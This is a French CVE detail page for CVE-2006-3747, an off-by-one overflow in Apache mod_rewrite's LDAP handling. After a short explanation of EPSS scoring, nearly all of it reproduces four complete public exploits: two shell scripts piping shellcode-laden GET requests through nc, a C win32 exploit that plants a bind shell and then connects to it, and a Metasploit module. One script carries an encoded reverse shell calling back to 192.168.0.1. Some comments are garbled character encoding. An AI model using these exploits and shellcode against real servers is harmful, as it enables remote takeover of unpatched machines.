CVE-2006-3747 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

#!/bin/sh # Exploit for Apache mod_rewrite off-by-one. # Vulnerability discovered by Mark Dowd. # CVE-2006-3747 # # by jack <jack\x40gulcas\x2Eorg> # 2006-08-20 # # Thx to xuso for help me with the shellcode. # # I suppose that you've the "RewriteRule kung/(.*) $1" rule if not # you must recalculate adressess. # # Shellcode is based on Taeho Oh bindshell on port 30464 and modified # for avoiding apache url-escape.. Take a look is quite nice ;) # # Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at # 0x0834ae77 for any other version/system find it. # # Gulcas rulez :P echo -e "mod_rewrite apache off-by-one overflow" echo "by jack <jack\x40gulcas\x2eorg>\n\n" if [ $# -ne 1 ] ; then echo "Usage: $0 webserver" exit fi host=$1 echo -ne "GET /kung/ldap://localhost/`perl -e 'print "%90"x128'`%89%e6\ %31%c0%31%db%89%f1%b0%02%89%06%b0%01%89%46%04%b0%06%89%46%08%b0%66%b3\ %01%cd%80%89%06%b0%02%66%89%46%0c%b0%77%66%89%46%0e%8d%46%0c%89%46%04\ %31%c0%89%46%10%b0%10%89%46%08%b0%66%b3%02%cd%80%b0%01%89%46%04%b0%66\ %b3%04%cd%80%31%c0%89%46%04%89%46%08%b0%66%b3%05%cd%80%88%c3%b0%3f%31\ %c9%cd%80%b0%3f%b1%01%cd%80%b0%3f%b1%02%cd%80%b8%23%62%69%6e%89%06%b8\ %23%73%68%23%89%46%04%31%c0%88%46%07%b0%30%2c%01%88%46%04%88%06%89%76\ %08%31%c0%89%46%0c%b0%0b%89%f3%8d%4e%08%8d%56%0c%cd%80%31%c0%b0%01%31%db\ %cd%80%3FC%3FC%3FCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC\ %77%ae%34%08CCCCCCCCCCCCCCCCCCCCCCCCCCC%3FC%3F HTTP/1.1\r\n\ Host: $host\r\n\r\n" | nc $host 80 # milw0rm.com [2006-08-21]

/* apache mod rewrite exploit (win32) By: fabio/b0x (oc-192, old CoTS member) Vuln details: http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded Code: bind shell on port 4445, tested on apache 2.0.58 with mod_rewrite (windows 2003) original exploit (http://milw0rm.com/exploits/3680) only had a call back on 192.168.0.1, also was a little buggy, so shellcode was rewriten, thanks to http://metasploit.com/ Usage: ./apache hostname rewrite_path Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard Example: ./apache 192.168.0.253 test [+]Preparing payload [+]Connecting... [+]Connected [+]Sending... [+]Sent [+]Starting second stage... [+]Connecting... [+]Connected [+]Sending... [+]Sent [+]Connecting to shell Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\Program Files\Apache Group\Apache2>exit exit [+]Owned */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <errno.h> #include <string.h> #include <netdb.h> #include <sys/types.h> #include <netinet/in.h> #include <sys/socket.h> #define PORT 80 #define PORT2 4444 #define MAXDATASIZE 1024 char get[] = "/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90"; char shellcode[]= "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49" "\x48\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41" "\x58\x50\x30\x42\x30\x41\x6b\x41\x41\x51\x41\x32\x41\x41\x32\x42" "\x42\x42\x30\x42\x41\x58\x38\x41\x42\x50\x75\x7a\x49\x4b\x58\x56" "\x36\x73\x30\x43\x30\x75\x50\x70\x53\x66\x35\x70\x56\x31\x47\x4c" "\x4b\x50\x6c\x44\x64\x55\x48\x6c\x4b\x73\x75\x75\x6c\x4c\x4b\x61" "\x44\x73\x35\x63\x48\x35\x51\x4b\x5a\x6c\x4b\x50\x4a\x37\x68\x6c" "\x4b\x42\x7a\x77\x50\x37\x71\x4a\x4b\x6b\x53\x44\x72\x30\x49\x6e" "\x6b\x44\x74\x6e\x6b\x56\x61\x68\x6e\x54\x71\x39\x6f\x6b\x4c\x70" "\x31\x4b\x70\x6c\x6c\x67\x48\x6b\x50\x54\x34\x53\x37\x6b\x71\x68" "\x4f\x44\x4d\x73\x31\x78\x47\x38\x6b\x38\x72\x45\x6b\x73\x4c\x31" "\x34\x46\x74\x52\x55\x6b\x51\x6c\x4b\x63\x6a\x65\x74\x56\x61\x7a" "\x4b\x32\x46\x4c\x4b\x76\x6c\x70\x4b\x4e\x6b\x30\x5a\x75\x4c\x67" "\x71\x5a\x4b\x6e\x6b\x74\x44\x4e\x6b\x57\x71\x6b\x58\x68\x6b\x76" "\x62\x50\x31\x4b\x70\x33\x6f\x53\x6e\x31\x4d\x63\x6b\x4b\x72\x65" "\x58\x55\x50\x61\x4e\x31\x7a\x36\x50\x42\x79\x70\x64\x4e\x6b\x74" "\x59\x6e\x6b\x43\x6b\x44\x4c\x4c\x4b\x51\x4b\x77\x6c\x4c\x4b\x35" "\x4b\x6e\x6b\x31\x4b\x74\x48\x73\x63\x63\x58\x6c\x4e\x70\x4e\x44" "\x4e\x78\x6c\x79\x6f\x4b\x66\x4d\x59\x6f\x37\x4b\x31\x78\x6c\x33" "\x30\x77\x71\x73\x30\x47\x70\x36\x37\x53\x66\x51\x43\x4d\x59\x69" "\x75\x39\x78\x56\x47\x57\x70\x37\x70\x37\x70\x6e\x70\x45\x51\x33" "\x30\x37\x70\x4c\x76\x72\x39\x55\x48\x7a\x47\x6d\x74\x45\x49\x54" "\x30\x4d\x39\x38\x65\x77\x39\x4b\x36\x50\x49\x6c\x64\x35\x4a\x52" "\x50\x4f\x37\x6c\x64\x4c\x6d\x76\x4e\x4d\x39\x4b\x69\x45\x59\x49" "\x65\x4e\x4d\x78\x4b\x4a\x4d\x6b\x4c\x77\x4b\x31\x47\x50\x53\x74" "\x72\x61\x4f\x46\x53\x67\x42\x57\x70\x61\x4b\x6c\x4d\x42\x6b\x75" "\x70\x70\x51\x6b\x4f\x7a\x77\x4b\x39\x4b\x6f\x4f\x79\x4f\x33\x4e" "\x6d\x71\x65\x52\x34\x53\x5a\x53\x37\x30\x59\x50\x51\x66\x33\x4b" "\x4f\x55\x64\x4c\x4f\x6b\x4f\x66\x35\x43\x34\x50\x59\x6e\x69\x47" "\x74\x6c\x4e\x6a\x42\x58\x72\x54\x6b\x64\x67\x72\x74\x39\x6f\x76" "\x57\x6b\x4f\x50\x55\x44\x70\x30\x31\x4b\x70\x50\x50\x30\x50\x50" "\x50\x32\x70\x77\x30\x46\x30\x53\x70\x70\x50\x49\x6f\x63\x65\x66" "\x4c\x4b\x39\x4f\x37\x30\x31\x6b\x6b\x33\x63\x71\x43\x42\x48\x54" "\x42\x63\x30\x76\x71\x63\x6c\x4c\x49\x6d\x30\x52\x4a\x32\x30\x32" "\x70\x36\x37\x59\x6f\x52\x75\x71\x34\x50\x53\x70\x57\x4b\x4f\x72" "\x75\x44\x68\x61\x43\x62\x74\x33\x67\x59\x6f\x63\x65\x67\x50\x4c" "\x49\x38\x47\x6d\x51\x5a\x4c\x53\x30\x36\x70\x53\x30\x33\x30\x4e" "\x69\x4b\x53\x53\x5a\x43\x30\x72\x48\x53\x30\x34\x50\x33\x30\x33" "\x30\x50\x53\x76\x37\x6b\x4f\x36\x35\x74\x58\x6e\x61\x4a\x4c\x67" "\x70\x35\x54\x33\x30\x63\x30\x49\x6f\x78\x53\x41"; char finish[]= "HTTP/1.0\r\nHost: "; char payload2[]= "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x18" "\xd9\x03\x3a\x83\xeb\xfc\xe2\xf4\xe4\xb3\xe8\x77\xf0\x20\xfc\xc5" "\xe7\xb9\x88\x56\x3c\xfd\x88\x7f\x24\x52\x7f\x3f\x60\xd8\xec\xb1" "\x57\xc1\x88\x65\x38\xd8\xe8\x73\x93\xed\x88\x3b\xf6\xe8\xc3\xa3" "\xb4\x5d\xc3\x4e\x1f\x18\xc9\x37\x19\x1b\xe8\xce\x23\x8d\x27\x12" "\x6d\x3c\x88\x65\x3c\xd8\xe8\x5c\x93\xd5\x48\xb1\x47\xc5\x02\xd1" "\x1b\xf5\x88\xb3\x74\xfd\x1f\x5b\xdb\xe8\xd8\x5e\x93\x9a\x33\xb1" "\x58\xd5\x88\x4a\x04\x74\x88\x7a\x10\x87\x6b\xb4\x56\xd7\xef\x6a" "\xe7\x0f\x65\x69\x7e\xb1\x30\x08\x70\xae\x70\x08\x47\x8d\xfc\xea" "\x70\x12\xee\xc6\x23\x89\xfc\xec\x47\x50\xe6\x5c\x99\x34\x0b\x38" "\x4d\xb3\x01\xc5\xc8\xb1\xda\x33\xed\x74\x54\xc5\xce\x8a\x50\x69" "\x4b\x8a\x40\x69\x5b\x8a\xfc\xea\x7e\xb1\x12\x67\x7e\x8a\x8a\xdb" "\x8d\xb1\xa7\x20\x68\x1e\x54\xc5\xce\xb3\x13\x6b\x4d\x26\xd3\x52" "\xbc\x74\x2d\xd3\x4f\x26\xd5\x69\x4d\x26\xd3\x52\xfd\x90\x85\x73" "\x4f\x26\xd5\x6a\x4c\x8d\x56\xc5\xc8\x4a\x6b\xdd\x61\x1f\x7a\x6d" "\xe7\x0f\x56\xc5\xc8\xbf\x69\x5e\x7e\xb1\x60\x57\x91\x3c\x69\x6a" "\x41\xf0\xcf\xb3\xff\xb3\x47\xb3\xfa\xe8\xc3\xc9\xb2\x27\x41\x17" "\xe6\x9b\x2f\xa9\x95\xa3\x3b\x91\xb3\x72\x6b\x48\xe6\x6a\x15\xc5" "\x6d\x9d\xfc\xec\x43\x8e\x51\x6b\x49\x88\x69\x3b\x49\x88\x56\x6b" "\xe7\x09\x6b\x97\xc1\xdc\xcd\x69\xe7\x0f\x69\xc5\xe7\xee\xfc\xea" "\x93\x8e\xff\xb9\xdc\xbd\xfc\xec\x4a\x26\xd3\x52\xe8\x53\x07\x65" "\x4b\x26\xd5\xc5\xc8\xd9\x03\x3a"; int main(int argc, char *argv[]) { int sockfd, numbytes; char buf[MAXDATASIZE]; struct hostent *he; struct sockaddr_in their_addr; printf(" Exploit: apache mod rewrite exploit (win32)\n" " By: fabio/b0x (oc-192, old CoTS member)\n" "Greetings: caffeine, raver, psikoma, cumatru, insomnia, teddym6, googleman, ares, trickster, rebel and Pentaguard\n" ); if (argc != 3) { printf(" Usage: ./apache hostname rewrite_path\n"); exit(1); } printf("\n[+]Preparing payload\n"); char payload[748]; sprintf(payload,"GET /%s%s%s%s%s\r\n\r\n\0",argv[2],get,shellcode,finish,argv[1]); printf("[+]Connecting...\n"); if ((he=gethostbyname(argv[1])) == NULL) { printf("[-]Cannot resolv hostname...\n"); exit(1); } if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) { printf("[-]Socket error...\n"); exit(1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(PORT); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero); if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { printf("[-]Unable to connect\n"); exit(1); } printf("[+]Connected\n[+]Sending...\n"); if (send(sockfd, payload, strlen(payload), 0) == -1){ printf("[-]Unable to send\n"); exit(1); } printf("[+]Sent\n"); close(sockfd); printf("[+]Starting second stage...\n"); sleep(3); printf("[+]Connecting...\n"); if ((he=gethostbyname(argv[1])) == NULL) { printf("[-]Cannot resolv hostname...\n"); exit(1); } if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) { printf("[-]Socket error...\n"); exit(1); } their_addr.sin_family = AF_INET; their_addr.sin_port = htons(PORT2); their_addr.sin_addr = *((struct in_addr *)he->h_addr); memset(their_addr.sin_zero, '\0', sizeof their_addr.sin_zero); if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) { printf("[-]Unable to connect\n"); exit(1); } printf("[+]Connected\n[+]Sending...\n"); if (send(sockfd, payload2, strlen(payload2), 0) == -1){ printf("[-]Unable to send\n"); exit(1); } printf("[+]Sent\n[+]Connecting to shell\n"); close(sockfd); sleep(3); int exec; char what[1024]; sprintf(what," nc -w 10 %s 4445",argv[1]); exec=system(what); if (exec!=0){ printf("[-]Not hacked\n"); } else { printf("[+]Owned\n"); } exit(1); } // milw0rm.com [2007-05-26]

## # $Id: apache_mod_rewrite_ldap.rb 8498 2010-02-15 00:48:03Z hdm $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Apache module mod_rewrite LDAP protocol Buffer Overflow', 'Description' => %q{ This module exploits the mod_rewrite LDAP protocol scheme handling flaw discovered by Mark Dowd, which produces an off-by-one overflow. Apache versions 1.3.29-36, 2.0.47-58, and 2.2.1-2 are vulnerable. This module requires REWRITEPATH to be set accurately. In addition, the target must have 'RewriteEngine on' configured, with a specific 'RewriteRule' condition enabled to allow for exploitation. The flaw affects multiple platforms, however this module currently only supports Windows based installations. }, 'Author' => 'patrick', 'Version' => '$Revision: 8498 $', 'References' => [ [ 'CVE', '2006-3747' ], [ 'OSVDB', '27588' ], [ 'BID', '19204' ], [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2006-07/0514.html' ], [ 'URL', 'http://www.milw0rm.com/exploits/3680' ], [ 'URL', 'http://www.milw0rm.com/exploits/3996' ], [ 'URL', 'http://www.milw0rm.com/exploits/2237' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Privileged' => true, 'Platform' => ['win'], # 'linux'], 'Payload' => { 'Space' => 636, 'BadChars' => "\x00\x0a\x0d\x20", 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, 'StackAdjustment' => -3500, 'DisableNops' => 'True', }, 'Targets' => [ [ 'Automatic', {} ], # patrickw tested OK 20090310 win32 ], 'DisclosureDate' => 'Jul 28 2006', 'DefaultTarget' => 0)) register_options( [ OptString.new('REWRITEPATH', [true, "The mod_rewrite URI path", "rewrite_path"]), ], self.class) end def check res = send_request_raw({ 'uri' => '/', 'version' => '1.1', }, 2) if (res.to_s =~ /Apache/) # This could be smarter. return Exploit::CheckCode::Detected end return Exploit::CheckCode::Safe end def exploit # On Linux Apache, it is possible to overwrite EIP by # sending ldap://<buf> ... TODO patrickw trigger = '/ldap://localhost/%3fA%3fA%3fCCCCCCCCCC%3fC%3f%90' print_status("Sending payload.") send_request_raw({ 'uri' => '/' + datastore['REWRITEPATH'] + trigger + payload.encoded, 'version' => '1.0', }, 2) handler end end

#!/bin/sh # Exploit for Apache mod_rewrite off-by-one(Win32). # # by axis <axis@ph4nt0m> # http://www.ph4nt0m.org # 2007-04-06 # # Tested on Apache 2.0.58 (Win32) # Windows2003 CN SP1 # # Vulnerable Apache Versions: # * 1.3 branch: >1.3.28 and <1.3.37 # * 2.0 branch: >2.0.46 and <2.0.59 # * 2.2 branch: >2.2.0 and <2.2.3 # # # Vulnerability discovered by Mark Dowd. # CVE-2006-3747 # # first POC by jack <jack\x40gulcas\x2Eorg> # 2006-08-20 # http://www.milw0rm.com/exploits/2237 # # # # to successfully exploit the vuln,there are some conditions # http://www.vuxml.org/freebsd/dc8c08c7-1e7c-11db-88cf-000c6ec775d9.html # # # some compilers added padding to the stack, so they could not be exploited,like gcc under redhat # # for more details about the vuln please see: # http://www.securityfocus.com/archive/1/archive/1/443870/100/0/threaded # # # no opcodes needed under windows! # it will directly run our shellcode # # my apache config file # [httpd.conf]: # RewriteEngine on # RewriteRule 1/(.*) $1 # RewriteLog "logs/rewrite.log" # RewriteLogLevel 3 # # # Usage: # [axis@security-lab2 xploits]$ sh mod_rewrite.sh 10.0.76.141 # mod_rewrite apache off-by-one overflow # # [axis@opensystemX axis]$ nc -vv -n -l -p 1154 # listening on [any] 1154 ... # connect to [x.x.x.111] from (UNKNOWN) [10.0.76.141] 4077 # Microsoft Windows [¡ã?¡À? 5.2.3790] # (C) ¡ã?¨¨¡§?¨´¨®D 1985-2003 Microsoft Corp. # # D:\Apache\Apache2>exit # exit # sent 5, rcvd 100 # # # # shellcode µÄbadchar£¬ÎÒÕâÀïÓõģ¬Æäʵ²»ÐèÒªÄÇô¶à # ÎÒ¸úµ½Á½¸öbadcharÊÇ 0x3fºÍ 0x0b ÆäËû¶¼ÊÇÒÔÇ°Éú³ÉshellcodeÏ°¹ßÐÔ±£ÁôµÄ # 0x00 0x3a 0x22 0x3b 0x7d 0x7b 0x3c 0x3e 0x5c 0x5d 0x3f 0x0b # echo -e "mod_rewrite apache off-by-one overflow" if [ $# -ne 1 ] ; then echo "Usage: $0 webserver" exit fi host=$1 #use ldap:// to trigger the vuln, "Ph4nt0m" is any arbitrary string echo -ne "GET /1/ldap://ph4nt0m/`perl -e 'print "Ph4nt0m"x5'`\ # %3f to trigger the vuln %3fA%3fA%3f\ #string "CCCC.." is any arbitrary string, use %3f to trigger the vuln #%90 is the machine code we will jmp to(NOP),run shellcode from here `perl -e 'print "C"x10'`%3fC%3f%90\ # shellcode,reverse shell to 192.168.0.1 ,port 1154 alpha2 encoded `perl -e 'print "\ \xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\ \x49\x49\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x51\x5a\x6a\x63\ \x58\x30\x42\x30\x50\x42\x6b\x42\x41\x73\x42\x32\x42\x41\x41\x32\ \x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x69\x79\x79\x6c\x51\ \x7a\x6a\x4b\x50\x4d\x4d\x38\x6b\x49\x79\x6f\x49\x6f\x6b\x4f\x65\ \x30\x4c\x4b\x72\x4c\x45\x74\x51\x34\x4e\x6b\x71\x55\x77\x4c\x6c\ \x4b\x33\x4c\x64\x45\x33\x48\x64\x41\x5a\x4f\x4c\x4b\x72\x6f\x36\ \x78\x4c\x4b\x73\x6f\x45\x70\x66\x61\x4a\x4b\x53\x79\x4e\x6b\x44\ \x74\x4e\x6b\x73\x31\x38\x6e\x55\x61\x79\x50\x6c\x59\x6c\x6c\x4b\ \x34\x6f\x30\x74\x34\x34\x47\x59\x51\x5a\x6a\x76\x6d\x76\x61\x6f\ \x32\x5a\x4b\x79\x64\x55\x6b\x33\x64\x51\x34\x41\x38\x30\x75\x4b\ \x55\x6e\x6b\x33\x6f\x44\x64\x46\x61\x7a\x4b\x32\x46\x6e\x6b\x34\ \x4c\x42\x6b\x6e\x6b\x73\x6f\x77\x6c\x54\x41\x58\x6b\x43\x33\x74\ \x6c\x6c\x4b\x4d\x59\x50\x6c\x74\x64\x75\x4c\x52\x41\x6f\x33\x50\ \x31\x6b\x6b\x72\x44\x4c\x4b\x50\x43\x66\x50\x6c\x4b\x33\x70\x64\ \x4c\x6c\x4b\x74\x30\x65\x4c\x4e\x4d\x4e\x6b\x53\x70\x47\x78\x33\ \x6e\x51\x78\x4c\x4e\x52\x6e\x56\x6e\x58\x6c\x50\x50\x59\x6f\x79\ \x46\x70\x66\x62\x73\x75\x36\x75\x38\x66\x53\x64\x72\x42\x48\x53\ \x47\x32\x53\x50\x32\x71\x4f\x71\x44\x49\x6f\x48\x50\x52\x48\x5a\ \x6b\x48\x6d\x6b\x4c\x65\x6b\x70\x50\x4b\x4f\x68\x56\x61\x4f\x4e\ \x69\x4a\x45\x30\x66\x6e\x61\x78\x6d\x67\x78\x73\x32\x42\x75\x52\ \x4a\x75\x52\x6b\x4f\x7a\x70\x61\x78\x6b\x69\x55\x59\x6c\x35\x6e\ \x4d\x51\x47\x4b\x4f\x4e\x36\x70\x53\x50\x53\x56\x33\x76\x33\x43\ \x73\x32\x73\x31\x53\x52\x73\x6b\x4f\x4a\x70\x70\x68\x6f\x30\x6d\ \x78\x35\x50\x46\x61\x30\x66\x30\x68\x76\x64\x6c\x42\x33\x56\x70\ \x53\x4e\x69\x78\x61\x4c\x55\x75\x38\x4a\x4c\x58\x79\x4c\x6a\x73\ \x50\x53\x67\x6b\x4f\x6a\x76\x73\x5a\x72\x30\x73\x61\x53\x65\x4b\ \x4f\x6a\x70\x52\x46\x31\x7a\x52\x44\x73\x56\x50\x68\x51\x73\x50\ \x6d\x32\x4a\x62\x70\x51\x49\x47\x59\x6a\x6c\x6c\x49\x4b\x57\x42\ \x4a\x73\x74\x6d\x59\x6d\x32\x35\x61\x6f\x30\x48\x73\x4f\x5a\x6f\ \x65\x4c\x49\x39\x6d\x4b\x4e\x33\x72\x54\x6d\x6b\x4e\x33\x72\x34\ \x6c\x6c\x4d\x50\x7a\x57\x48\x4e\x4b\x4c\x6b\x6c\x6b\x71\x78\x32\ \x52\x6b\x4e\x6c\x73\x42\x36\x49\x6f\x73\x45\x65\x78\x6b\x4f\x6e\ \x36\x71\x4b\x42\x77\x43\x62\x53\x61\x76\x31\x70\x51\x30\x6a\x35\ \x51\x62\x71\x76\x31\x72\x75\x43\x61\x4b\x4f\x6e\x30\x73\x58\x4e\ \x4d\x7a\x79\x37\x75\x38\x4e\x31\x43\x4b\x4f\x4a\x76\x30\x6a\x39\ \x6f\x6b\x4f\x70\x37\x6b\x4f\x6e\x30\x45\x38\x39\x77\x54\x39\x79\ \x56\x71\x69\x79\x6f\x53\x45\x56\x64\x69\x6f\x69\x46\x6b\x4f\x62\ \x57\x6b\x4c\x4b\x4f\x6a\x70\x50\x68\x6a\x50\x6f\x7a\x37\x74\x43\ \x6f\x72\x73\x4b\x4f\x6a\x76\x79\x6f\x38\x50\x63\ "'`\ HTTP/1.0\r\n\ Host: $host\r\n\r\n" | nc -vv $host 80 # milw0rm.com [2007-04-07]